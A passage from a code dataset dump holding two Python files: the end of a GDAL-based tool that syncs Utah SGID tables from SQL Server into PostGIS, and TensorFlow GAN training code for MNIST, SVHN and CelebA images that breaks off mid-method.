LOG.debug(f'{Fore.CYAN}filtering for specific tables{Fore.RESET}')\n\n filter_tables = True\n\n LOG.verbose('connecting to database')\n connection = gdal.OpenEx(connection_string)\n\n LOG.verbose('getting layer count')\n table_count = connection.GetLayerCount()\n\n LOG.info(f'discovered {Fore.YELLOW}{table_count}{Fore.RESET} tables')\n\n for table_index in range(table_count):\n qualified_layer = connection.GetLayerByIndex(table_index)\n schema_name, layer = qualified_layer.GetName().split('.')\n schema_name = schema_name.lower()\n layer = layer.lower()\n\n LOG.debug(f'- {Fore.CYAN}{schema_name}.{layer}{Fore.RESET}')\n\n if schema_name in config.EXCLUDE_SCHEMAS or filter_tables and f'{schema_name}.{layer}' not in specific_tables:\n LOG.verbose(f' {Fore.RED}- skipping:{Fore.RESET} {schema_name}')\n\n continue\n\n definition = qualified_layer.GetLayerDefn()\n\n fields = []\n for field_index in range(definition.GetFieldCount()):\n field = definition.GetFieldDefn(field_index)\n\n field_name = field.GetName().lower()\n\n if field_name in config.EXCLUDE_FIELDS:\n LOG.verbose(f' {Fore.YELLOW}- skipping:{Fore.RESET} {field_name}')\n\n continue\n\n fields.append(field_name)\n\n layer_schema_map.append((schema_name, layer, fields))\n\n del qualified_layer\n\n schema_map_count = len(layer_schema_map)\n noun = 'tables'\n if schema_map_count == 1:\n noun = 'table'\n\n LOG.info(f'planning to import {Fore.GREEN}{schema_map_count}{Fore.RESET} {noun}')\n layer_schema_map.sort(key=lambda items: items[0])\n\n connection = None\n\n return layer_schema_map\n\n\ndef _get_schema_table_name_map(table_name):\n '''a method to split a qualified table into it's parts\n '''\n parts = table_name.split('.')\n\n schema_index = 1\n table_index = 2\n\n if len(parts) == 2:\n schema_index = 0\n table_index = 1\n\n return {'schema': parts[schema_index].lower(), 'table_name': parts[table_index].lower()}\n\n\ndef _format_title_for_pg(title):\n if title is None:\n return title\n\n new_title = title.lower()\n new_title = new_title.replace('utah ', '', 1).replace(' ', '_')\n\n LOG.verbose(f'updating {Fore.MAGENTA}{title}{Fore.RESET} to {Fore.CYAN}{new_title}{Fore.RESET}')\n\n return new_title\n\n\ndef _get_table_meta():\n '''gets the meta data about fields from meta.agolitems\n '''\n mapping = {}\n\n with pyodbc.connect(config.get_source_connection()[6:]) as connection:\n cursor = connection.cursor()\n\n cursor.execute(\"SELECT [TABLENAME],[AGOL_PUBLISHED_NAME],[GEOMETRY_TYPE] FROM [SGID].[META].[AGOLITEMS]\")\n rows = cursor.fetchall()\n\n #: table: SGID.ENVIRONMENT.DAQPermitCompApproval\n #: title: Utah Retail Culinary Water Service Areas\n #: geometry_type: POINT POLYGON POLYLINE\n for table, title, geometry_type in rows:\n table_parts = _get_schema_table_name_map(table)\n pg_title = _format_title_for_pg(title)\n\n schema_name = mapping.setdefault(table_parts['schema'], {})\n schema_name[table_parts['table_name']] = {'title': pg_title, 'geometry_type': geometry_type}\n\n return mapping\n\n\ndef _populate_table_cache(connection_string, pgify=False, name_map=None):\n '''adds all the table from a connection string to a dictionary for caching purposes\n pgify: lowercases and adds underscores\n name_map: is a dictionary to replace names from the meta table\n '''\n skip_schema = ['meta', 'sde']\n LOG.verbose('connecting to database')\n #: gdal.open gave a 0 table count\n connection = ogr.Open(connection_string)\n\n LOG.verbose('getting layer count')\n table_count = connection.GetLayerCount()\n\n LOG.debug(f'found {Fore.YELLOW}{table_count}{Fore.RESET} total tables for cache')\n CONNECTION_TABLE_CACHE.setdefault(connection_string, [])\n\n for table_index in range(table_count):\n qualified_layer = connection.GetLayerByIndex(table_index)\n table = None\n\n if qualified_layer:\n name = qualified_layer.GetName()\n LOG.verbose(f'qualified layer name: {name}')\n\n if '.' not in name:\n continue\n\n table_parts = _get_schema_table_name_map(name)\n name = f\"{table_parts['schema']}.{table_parts['table_name']}\"\n\n if table_parts['schema'] in skip_schema:\n continue\n\n if pgify:\n pg_title = _format_title_for_pg(table_parts['table_name'])\n schema_name = table_parts['schema']\n\n if schema_name in name_map and pg_title in name_map[schema_name]:\n table, _ = name_map[schema_name][pg_title].values()\n else:\n continue\n\n name = f\"{schema_name}.{table}\"\n\n LOG.verbose(f'found layer: {name}')\n\n CONNECTION_TABLE_CACHE[connection_string].append(name)\n\n del qualified_layer\n connection = None\n\n\ndef _check_if_exists(connection_string, schema_name, table, agol_meta_map):\n '''returns true or false if a table exists in the connections_string db\n connection_string: string of db to check\n schema_name: string schema name\n table: string table name\n returns: bool\n '''\n LOG.debug('checking cache')\n\n if schema_name in agol_meta_map and table in agol_meta_map[schema_name]:\n table, _ = agol_meta_map[schema_name][table].values()\n\n if connection_string in CONNECTION_TABLE_CACHE and len(CONNECTION_TABLE_CACHE[connection_string]) > 0:\n LOG.verbose('cache hit')\n\n return f'{schema_name}.{table}' in CONNECTION_TABLE_CACHE[connection_string]\n\n LOG.verbose('cache miss')\n _populate_table_cache(connection_string)\n\n found = False\n if f'{schema}.{table}' in CONNECTION_TABLE_CACHE[connection_string]:\n found = True\n\n return found\n\n\ndef _replace_data(schema_name, layer, fields, agol_meta_map, dry_run):\n '''the insert logic for writing to the destination\n '''\n cloud_db = config.format_ogr_connection(config.DBO_CONNECTION)\n internal_sgid = config.get_source_connection()\n\n sql = f'SELECT objectid FROM \"{schema_name}.{layer}\"'\n\n if len(fields) > 0:\n #: escape reserved words?\n fields = [f'\"{field}\"' for field in fields]\n sql = f\"SELECT {','.join(fields)} FROM \\\"{schema_name}.{layer}\\\"\"\n\n options = [\n '-f',\n 'PostgreSQL',\n '-dialect',\n 'OGRSQL',\n '-sql',\n sql,\n '-lco',\n 'FID=xid',\n '-lco',\n f'SCHEMA={schema_name}',\n '-lco',\n 'OVERWRITE=YES',\n '-lco',\n 'GEOMETRY_NAME=shape',\n '-lco',\n 'PRECISION=YES',\n '-a_srs',\n config.UTM,\n ]\n\n if schema_name in agol_meta_map and layer in agol_meta_map[schema_name]:\n new_name, geometry_type = agol_meta_map[schema_name][layer].values()\n\n if new_name:\n layer = new_name\n\n if geometry_type == 'POLYGON':\n options.append('-nlt')\n options.append('MULTIPOLYGON')\n elif geometry_type == 'POLYLINE':\n options.append('-nlt')\n options.append('MULTILINESTRING')\n elif geometry_type == 'STAND ALONE':\n options.append('-nlt')\n options.append('NONE')\n else:\n options.append('-nlt')\n options.append(geometry_type)\n else:\n LOG.info(f'- skipping {Fore.MAGENTA}{layer}{Fore.RESET} since it is no longer in the meta table{Fore.RESET}')\n\n return\n\n options.append('-nln')\n options.append(f'{layer}')\n\n pg_options = gdal.VectorTranslateOptions(options=options)\n\n LOG.info(f'- inserting {Fore.MAGENTA}{layer}{Fore.RESET} into {Fore.BLUE}{schema_name}{Fore.RESET} as {Fore.CYAN}{geometry_type}{Fore.RESET}')\n LOG.debug(f'with {Fore.CYAN}{sql}{Fore.RESET}')\n\n if not dry_run:\n start_seconds = perf_counter()\n result = gdal.VectorTranslate(cloud_db, internal_sgid, options=pg_options)\n LOG.debug(f'- {Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n del result\n\n LOG.debug(f'- {Fore.CYAN}make valid{Fore.RESET}')\n make_valid(f'{schema_name}.{layer}')\n\n\ndef import_data(if_not_exists, missing_only, dry_run):\n '''imports data from sql to postgis\n if_not_exists: create new tables if the destination does not have it\n dry_run: do not modify the destination\n missing_only: only import missing tables\n '''\n cloud_db = config.format_ogr_connection(config.DBO_CONNECTION)\n internal_sgid = config.get_source_connection()\n\n tables = []\n if missing_only:\n source, destination = _get_table_sets()\n tables = destination - source\n\n table_count = len(tables)\n\n verb = 'are'\n noun = 'tables'\n if table_count == 1:\n verb = 'is'\n noun = 'table'\n\n LOG.info(f'there {verb} {Fore.CYAN}{table_count}{Fore.RESET} {noun} in the source not in the destination')\n LOG.verbose(','.join(tables))\n\n if table_count == 0:\n return\n\n agol_meta_map = _get_table_meta()\n\n if missing_only:\n origin_table_name = []\n\n #: reverse lookup the table names\n for table in tables:\n schema_name, table_name = table.split('.')\n schema_name = schema_name.lower()\n table_name = table_name.lower()\n\n schema_items = agol_meta_map[schema_name]\n for origin_name in schema_items:\n if schema_items[origin_name]['title'] == table_name:\n origin_table_name.append(f'{schema_name}.{origin_name}')\n break\n\n if len(origin_table_name) > 0:\n tables = origin_table_name\n\n layer_schema_map = _get_tables_with_fields(internal_sgid, tables)\n\n for schema_name, layer, fields in layer_schema_map:\n if if_not_exists and _check_if_exists(cloud_db, schema_name, layer, agol_meta_map):\n LOG.info(f'- skipping {Fore.MAGENTA}{schema_name}.{layer} {Fore.CYAN}already exists{Fore.RESET}')\n\n continue\n\n _replace_data(schema_name, layer, fields, agol_meta_map, dry_run)\n\n\ndef _get_table_sets():\n '''gets a set of each schema.tablename from the source and destination database to help figure out what is different between them\n '''\n cloud_db = config.format_ogr_connection(config.DBO_CONNECTION)\n internal_sgid = config.get_source_connection()\n\n if cloud_db not in CONNECTION_TABLE_CACHE:\n _populate_table_cache(cloud_db)\n\n if internal_sgid not in CONNECTION_TABLE_CACHE:\n _populate_table_cache(internal_sgid, pgify=True, name_map=_get_table_meta())\n\n source = set(CONNECTION_TABLE_CACHE[cloud_db])\n destination = set(CONNECTION_TABLE_CACHE[internal_sgid])\n\n return source, destination\n\n\ndef trim(dry_run):\n '''get source tables with updated names\n get destination tables with original names\n drop the tables in the destination found in the difference between the two sets\n '''\n\n source, destination = _get_table_sets()\n items_to_trim = source - destination\n items_to_trim_count = len(items_to_trim)\n\n verb = 'are'\n noun = 'tables'\n if items_to_trim_count == 1:\n verb = 'is'\n noun = 'table'\n\n LOG.info(f'there {verb} {Fore.CYAN}{items_to_trim_count}{Fore.RESET} {noun} in the destination not in the source')\n LOG.verbose(','.join(items_to_trim))\n\n if items_to_trim_count == 0:\n return\n\n sql = f'DROP TABLE {\",\".join(items_to_trim)}'\n LOG.info(f'dropping {items_to_trim}')\n\n if not dry_run:\n execute_sql(sql, config.DBO_CONNECTION)\n\n LOG.info(f'{Fore.GREEN}finished{Fore.RESET}')\n\n\ndef update(specific_tables, dry_run):\n '''update specific tables in the destination\n specific_tables: a list of tables from the source without the schema\n dry_run: bool if insertion should actually happen\n '''\n internal_sgid = config.get_source_connection()\n\n if not specific_tables or len(specific_tables) == 0:\n LOG.info(f'{Fore.YELLOW} no tables to import!{Fore.RESET}')\n\n return\n\n layer_schema_map = _get_tables_with_fields(internal_sgid, specific_tables)\n\n if len(layer_schema_map) == 0:\n LOG.info(f'{Fore.YELLOW} no matching table found!{Fore.RESET}')\n\n return\n\n agol_meta_map = _get_table_meta()\n\n if len(specific_tables) != len(layer_schema_map):\n LOG.warn((\n f'{Back.YELLOW}{Fore.BLACK}input {len(specific_tables)} tables but only {len(layer_schema_map)} found.{Fore.RESET}{Back.RESET} '\n 'check your spelling'\n ))\n\n for schema_name, layer, fields in layer_schema_map:\n _replace_data(schema_name, layer, fields, agol_meta_map, dry_run)\n\n\ndef read_last_check_date():\n last_checked = Path('./.last_checked')\n\n if not last_checked.exists():\n last_checked.touch()\n\n last_date_string = ''\n with open(last_checked, 'r') as log_file:\n last_date_string = log_file.readline().strip()\n\n if last_date_string is None or len(last_date_string) < 1:\n return None\n\n return last_date_string\n\n\ndef update_last_check_date():\n last_checked = Path('./.last_checked')\n\n if not last_checked.exists():\n last_checked.touch()\n\n with open(last_checked, 'w') as log_file:\n log_file.write(datetime.today().strftime('%Y-%m-%d'))\n\n\ndef get_tables_from_change_detection():\n last_checked = read_last_check_date()\n\n if last_checked is None:\n last_checked = datetime.today()\n else:\n last_checked = datetime.strptime(last_checked, '%Y-%m-%d')\n\n LOG.info(f'Checking for changes since {Fore.MAGENTA}{last_checked}{Fore.RESET}')\n\n updated_tables = []\n with pyodbc.connect(config.get_source_connection()[6:]) as connection:\n cursor = connection.cursor()\n\n cursor.execute(\"SELECT [TABLE_NAME] FROM [SGID].[META].[CHANGEDETECTION] WHERE [LAST_MODIFIED] >= ?\", last_checked)\n rows = cursor.fetchall()\n\n #: table: SGID.ENVIRONMENT.DAQPermitCompApproval\n for table, in rows:\n table_parts = _get_schema_table_name_map(table)\n\n table_schema = table_parts['schema']\n table_name = table_parts['table_name']\n updated_tables.append(f'{table_schema}.{table_name}')\n\n update_last_check_date()\n\n return updated_tables\n\n\ndef make_valid(layer):\n '''update invalid shapes in postgres\n '''\n sql = f'UPDATE {layer} SET shape = ST_MakeValid(shape) WHERE ST_IsValid(shape) = false;'\n\n unfixable_layers = ['utilities.broadband_service']\n if layer in unfixable_layers:\n return\n\n try:\n execute_sql(sql, config.DBO_CONNECTION)\n except psycopg2.errors.UndefinedColumn:\n #: table doesn't have shape field\n pass\n\n\ndef main():\n '''Main entry point for program. Parse arguments and pass to sweeper modules.\n '''\n init()\n args = docopt(__doc__, version='1.0.0')\n\n start_seconds = perf_counter()\n\n LOG.init(args['--verbosity'])\n LOG.debug(f'{Back.WHITE}{Fore.BLACK}{args}{Back.RESET}{Fore.RESET}')\n\n if args['enable']:\n enable_extensions()\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['create']:\n if args['schema']:\n name = args['--schemas']\n\n if name is None or name == 'all':\n schema.create_schemas(config.SCHEMAS)\n sys.exit()\n\n name = name.lower()\n\n if name in config.SCHEMAS:\n schema.create_schemas([name])\n sys.exit()\n\n if args['admin-user']:\n roles.create_admin_user(config.ADMIN)\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['read-only-user']:\n roles.create_read_only_user(config.SCHEMAS)\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['drop']:\n if args['schema']:\n name = args['--schemas']\n\n if name is None or name == 'all':\n schema.drop_schemas(config.SCHEMAS)\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n name = name.lower()\n\n if name in config.SCHEMAS:\n schema.drop_schemas([name])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['import']:\n import_data(args['--skip-if-exists'], args['--missing'], args['--dry-run'])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['trim']:\n trim(args['--dry-run'])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n if args['update']:\n tables = args['--table']\n\n if args['--from-change-detection']:\n tables = get_tables_from_change_detection()\n\n update(tables, args['--dry-run'])\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n LOG.info(f'{Fore.GREEN}completed{Fore.RESET} in {Fore.CYAN}{utils.format_time(perf_counter() - start_seconds)}{Fore.RESET}')\n\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/cloudb/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142108478","text":"import importlib as imp\nimport os\nimport pickle as pkl\nimport pylab as plt\n\nimport numpy as np\nimport tensorflow as tf\n\nimport glob\nimport PIL as pil\n\nimport tqdm\n\n# 引用外部包。包含有一份 __init__.py文件的目录\n# 工具包 和 项目的全局设置\nimport DsPython.DsTools as tools\n\n# 首先必须先引用父包,将当前的模块的路径信息加进去。\nfrom .. import this_module as parent_module\n\n# 将当前模块的设置信息加入到全局变量\nthis_module = tools.global_setting.add_module_setting(\n file=__file__, parent=parent_module\n)\n\n# 导入当前目录下的子模块,该子模块包含一个 __init__.py 文件\n# from . import p1 as p1\n# from . import p2 as p2\n\ndef reload():\n print('reload in {}'.format(__file__))\n\n # 重新加载外部包。\n imp.reload(tools)\n tools.reload()\n\n # 重新加载兄弟包。\n # imp.reload(p2)\n # p2.reload()\n\n # 重载每一个一级模块,并且让每个一级模块重载自己的子模块。\n\n# # 在此派生继承自外部的类\n# class p1_from_p2(p2.c1.p2_class_1):\n# def __init__(self):\n# super(p1_from_p2, self).__init__('this dir')\n# print('p1_from_p2 init :{}'.format(__file__))\n\n\ndef view_samples_2():\n global path_saver\n with open(path_saver, 'rb') as f:\n samples = pkl.load(f)\n\n rows, cols = 10, 6\n fig, axes = plt.subplots(figsize=(7, 12), nrows=rows, ncols=cols, sharex=True, sharey=True)\n\n for sample, ax_row in zip(samples[::int(len(samples) / rows)], axes):\n for img, ax in zip(sample[::int(len(sample) / cols)], ax_row):\n ax.imshow(img.reshape((28, 28)), cmap='Greys_r')\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n\ndef view_samples(epoch=-1, samples=None):\n global path_saver\n\n if samples is None:\n with open(path_saver, 'rb') as f:\n samples = pkl.load(f)\n\n fig, axes = plt.subplots(figsize=(7, 7), nrows=4, ncols=4, sharey=True, sharex=True)\n for ax, img in zip(axes.flatten(), samples[epoch]):\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n im = ax.imshow(img.reshape((28, 28)), cmap='Greys_r')\n\n return fig, axes\n\n\nMNIST_DIR = os.path.join(parent_module['datas path'], 'MNIST_data')\nSVHM_DIR = os.path.join(parent_module['datas path'], 'SVHM')\n\ndatas_path = this_module['datas path']\n\ncheckpoints_name = 'generator.ckpt'\ncheckpoints_dir = os.path.join(datas_path, 'checkpoints')\ntools.global_setting.dir_init(checkpoints_dir)\ncheckpoints_path = os.path.join(checkpoints_dir, checkpoints_name)\n# sample_path = os.path.join(datas_path, 'train_samples.pkl')\n\n# Tired of seeing the same results every time? Remove the line below.\n# np.random.seed(42)\n# Size of input image to discriminator\ninput_size = 784 # 28x28 MNIST images flattened 一张输入图片被一维化了。\n\n# Size of latent vector to generator\n# 随机生成的噪点,\nZ_NOISE_SIZE = 100\n\n# Sizes of hidden layers in generator and discriminator\nG_HIDDEN_SIZE = 128\nD_HIDDEN_SIZE = 128\n# Leak factor for leaky ReLU\nLEAKY_RELU_ALPHA = 0.01\n# Label smoothing\n# 标签平滑化的参数。\nsmooth = 0.1\n\nDROPOUT = .3\n# Optimizers\nLEARNING_RATE = 0.002\n\nBATCH_SIZE = 128\n\n\ndef do_this():\n\n celeba_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'img_align_celeba')\n svhm_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'SVHM')\n mnist_images_dir = os.path.join(parent_module['datas path'], 'gan_datas', 'mnist')\n mnist_npz_file = os.path.join(parent_module['datas path'], 'gan_datas', 'mnist.npz')\n\n\n dts_svhm = tools.tf.DsDataset()\n dts_svhm.sample_svhm(dir=svhm_dir, use_scaler=True, feature_range=(-1,1))\n\n # dts = tools.tf.DsDataset()\n # dts.sample_from_images_dir(dir=mnist_images_dir, use_scaler=True,)\n # model = DsTfGan(dataset=dts)\n\n # # 生成器生成的值范围在(-1,1),所以缩放器要设置在相同区域。\n dts_mnist = tools.tf.DsDataset()\n dts_mnist.sample_mnist(npz_dir=mnist_npz_file, use_scaler=True)\n\n dts_celeba = tools.tf.DsDataset()\n dts_celeba.sample_celeba(dir=celeba_dir, use_big_size=False, use_scaler=True)\n\n dts = dts_celeba\n\n model = DsTfGan(dataset=dts)\n\n return model\n\n\ndef tf_svhm(epochs=2, train_size=None):\n\n # 设定log目录\n log_dir = os.path.join(datas_path, 'gan_svhm', 'log')\n\n # 加载数据\n\n from scipy.io import loadmat\n trainset = loadmat(os.path.join(SVHM_DIR, 'train_32x32.mat'))\n testset = loadmat(os.path.join(SVHM_DIR, 'test_32x32.mat'))\n\n # 初始化图\n tf.reset_default_graph()\n\n # 全局随机数种子\n # tf.set_random_seed(RANDOM_SEED)\n\n # input 占位符\n def model_inputs(real_dim, z_dim):\n inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n inputs_z = tf.placeholder(tf.float32, (None, z_dim), name='input_z')\n\n return inputs_real, inputs_z\n\n def generator(z, output_dim, reuse=False, alpha=0.2, training=True):\n with tf.variable_scope('generator', reuse=reuse):\n # First fully connected layer\n x1 = tf.layers.dense(z, 4 * 4 * 512)\n # Reshape it to start the convolutional stack\n x1 = tf.reshape(x1, (-1, 4, 4, 512))\n x1 = tf.layers.batch_normalization(x1, training=training)\n x1 = tf.maximum(alpha * x1, x1)\n # 4x4x512 now\n\n x2 = tf.layers.conv2d_transpose(inputs=x1, filters=256, kernel_size=5, strides=2, padding='same')\n x2 = tf.layers.batch_normalization(inputs=x2, training=training)\n x2 = tf.maximum(alpha * x2, x2)\n # 8x8x256 now\n\n x3 = tf.layers.conv2d_transpose(inputs=x2, filters=128, kernel_size=5, strides=2, padding='same')\n x3 = tf.layers.batch_normalization(inputs=x3, training=training)\n x3 = tf.maximum(alpha * x3, x3)\n # 16x16x128 now\n\n # Output layer\n logits = tf.layers.conv2d_transpose(inputs=x3, filters=output_dim, kernel_size=5, strides=2, padding='same')\n # 32x32x3 now\n\n out = tf.tanh(logits)\n\n return out\n\n def discriminator(x, reuse=False, alpha=0.2):\n with tf.variable_scope('discriminator', reuse=reuse):\n # Input layer is 32x32x3\n x1 = tf.layers.conv2d(x, 64, 5, strides=2, padding='same')\n relu1 = tf.maximum(alpha * x1, x1)\n # 16x16x64\n\n x2 = tf.layers.conv2d(relu1, 128, 5, strides=2, padding='same')\n bn2 = tf.layers.batch_normalization(x2, training=True)\n relu2 = tf.maximum(alpha * bn2, bn2)\n # 8x8x128\n\n x3 = tf.layers.conv2d(relu2, 256, 5, strides=2, padding='same')\n bn3 = tf.layers.batch_normalization(x3, training=True)\n relu3 = tf.maximum(alpha * bn3, bn3)\n # 4x4x256\n\n # Flatten it\n flat = tf.reshape(relu3, (-1, 4 * 4 * 256))\n logits = tf.layers.dense(flat, 1)\n out = tf.sigmoid(logits)\n\n return out, logits\n\n def model_loss(input_real, input_z, output_dim, alpha=0.2):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n g_model = generator(input_z, output_dim, alpha=alpha)\n d_model_real, d_logits_real = discriminator(input_real, alpha=alpha)\n d_model_fake, d_logits_fake = discriminator(g_model, reuse=True, alpha=alpha)\n\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real, labels=tf.ones_like(d_model_real)))\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_model_fake)))\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.ones_like(d_model_fake)))\n\n d_loss = d_loss_real + d_loss_fake\n\n # tf.summary.scalar(name='dloss', d_loss)\n # tf.summary.scalar(name='gloss', g_loss)\n\n tf.summary.scalar('g_loss', g_loss)\n tf.summary.scalar('d_loss', d_loss)\n tf.summary.image(\n name='g_model',\n max_outputs=1,\n tensor=g_model\n )\n\n return d_loss, g_loss\n\n def model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n # Get weights and bias to update\n t_vars = tf.trainable_variables()\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n # Optimize\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n\n return d_train_opt, g_train_opt\n\n class GAN:\n def __init__(self, real_size, z_size, learning_rate, alpha=0.2, beta1=0.5):\n tf.reset_default_graph()\n\n self.input_real, self.input_z = model_inputs(real_size, z_size)\n\n self.d_loss, self.g_loss = model_loss(\n self.input_real, self.input_z, real_size[2], alpha=alpha\n )\n\n self.d_opt, self.g_opt = model_opt(\n self.d_loss, self.g_loss, learning_rate, beta1\n )\n\n def view_samples(epoch, samples, nrows, ncols, figsize=(5, 5)):\n fig, axes = plt.subplots(\n figsize=figsize, nrows=nrows, ncols=ncols,sharey=True, sharex=True\n )\n for ax, img in zip(axes.flatten(), samples[epoch]):\n ax.axis('off')\n img = ((img - img.min()) * 255 / (img.max() - img.min())).astype(np.uint8)\n ax.set_adjustable('box-forced')\n im = ax.imshow(img, aspect='equal')\n\n plt.subplots_adjust(wspace=0, hspace=0)\n return fig, axes\n\n def train(net, dataset, epochs=1, print_every=10, show_every=100, figsize=(5, 5)):\n\n # samples, losses = [], []\n steps = 0\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n merged = tf.summary.merge_all() # 将图形、训练过程等数据合并在一起\n log = tools.tf.DsTfLog(log_dir=log_dir, graph=sess.graph)\n\n for e in range(epochs):\n print('训练数据遍历 {}/{} 代'.format(e+1, epochs))\n\n batch = dataset.batches()\n dataset.summary()\n # 运行摘要所需要的数据。\n log_feed_dict = None\n #\n for _ in tqdm.tqdm(range(dataset.batch_count)):\n\n x, y = next(batch)\n steps += 1\n # print('step:{}, x.shape:{} '.format(steps, x.shape))\n # Sample random noise for G\n batch_z = np.random.uniform(-1, 1, size=(batch_size, z_size))\n\n # Run optimizers\n log_feed_dict = {net.input_real: x, net.input_z: batch_z}\n sess.run(net.d_opt, feed_dict=log_feed_dict)\n\n sess.run(net.g_opt, feed_dict={net.input_z: batch_z, net.input_real: x})\n\n # 训练完一代数据后,运行摘要\n m = sess.run(merged, feed_dict=log_feed_dict)\n log.writer.add_summary(summary=m, global_step=e)\n\n # if steps % print_every == 0:\n # # At the end of each epoch, get the losses and print them out\n # train_loss_d = net.d_loss.eval({net.input_z: batch_z, net.input_real: x})\n # train_loss_g = net.g_loss.eval({net.input_z: batch_z})\n #\n # print(\"Epoch {}/{}...\".format(e + 1, epochs),\n # \"Discriminator Loss: {:.4f}...\".format(train_loss_d),\n # \"Generator Loss: {:.4f}\".format(train_loss_g))\n # # Save losses to view after training\n # losses.append((train_loss_d, train_loss_g))\n #\n # if steps % show_every == 0:\n # sample_z = np.random.uniform(-1, 1, size=(72, z_size))\n # gen_samples = sess.run(\n # generator(net.input_z, 3, reuse=True, training=False),\n # feed_dict={net.input_z: sample_z})\n # samples.append(gen_samples)\n # _ = view_samples(-1, samples, 6, 12, figsize=figsize)\n # plt.show()\n\n saver = tf.train.Saver()\n saver.save(sess, log_dir)\n\n\n real_size = (32, 32, 3)\n z_size = 100\n learning_rate = 0.0002\n batch_size = 128\n alpha = 0.2\n beta1 = 0.5\n\n dataset = tools.tf.DsDataset(train=trainset, test=testset, train_size=train_size)\n\n net = GAN(dataset.input_shape, z_size, learning_rate, alpha=alpha, beta1=beta1)\n\n train(net, dataset, epochs=epochs, figsize=(10, 5))\n\n\nclass DsTfFrame(object):\n def __init__(self, dataset, learning_rate=0.0005, leak_alpha=.2, beta1=.5):\n self.class_name = str(type(self)).replace('>', '').replace(\"'\", '').split('.')[-1:][0]\n self.dataset = dataset\n\n self.hp_learning_rate =learning_rate\n self.hp_leak_relu_alpha = leak_alpha\n self.hp_beta1 = beta1\n\n # 设定log目录\n self.datas_root = os.path.join(datas_path, self.class_name)\n self.log_dir = os.path.join(self.datas_root, 'log')\n self.ckpt_file = os.path.join(self.log_dir, 'model.ckpt')\n print('datas path :', self.datas_root)\n print('log path :', self.log_dir)\n print('checkpoint file path :', self.ckpt_file)\n\n tf.reset_default_graph()\n\n self.fs = tools.tf.FlowStep(run_count_max=1)\n\n def model(self):\n self.model_inputs()\n\n # 输入\n self.ph_input_real, self.ph_input_noise, self.ph_learning_rate = self.model_inputs()\n\n # 损失\n g_imgs, d_loss, g_loss = self.model_loss(self.ph_input_real, self.ph_input_noise, self.dataset.input_shape[2])\n self.loss = [g_imgs, d_loss, g_loss]\n\n # 优化\n d_opt, g_opt = self.model_opt(\n d_loss=d_loss, g_loss=g_loss,\n learning_rate=self.ph_learning_rate, beta1=self.hp_beta1\n )\n self.train_opt = [d_opt, g_opt]\n\n def model_inputs(self, ):\n # real_dim = (32, 32, 3)\n # (None, *real_dim) = (None, 32, 32, 3) 引用值\n # (None, real_dim) = (None, (32, 32, 3)) 引用对象\n # inputs_real = tf.placeholder(tf.float32, (None, *real_dim), name='input_real')\n self.input = tf.placeholder(dtype=tf.float32, shape=(None, *self.dataset.input_shape), name='input')\n self.label = tf.placeholder(dtype=tf.float32, shape=(None, 10))\n self.fs.add_one_step('input', self.input)\n\n return self.input\n\n def get_batchs_generator(self, train_batchs):\n batch = self.dataset.get_generator(train_batchs=train_batchs)\n self.dataset.summary()\n\n return batch\n\n def get_feed_dict(self, batch):\n # 获取一批数据\n # 得到该批数据的长度\n x, y = next(batch)\n x = self.dataset.scaler_transform(data=x)\n this_batch_length = len(x)\n\n # 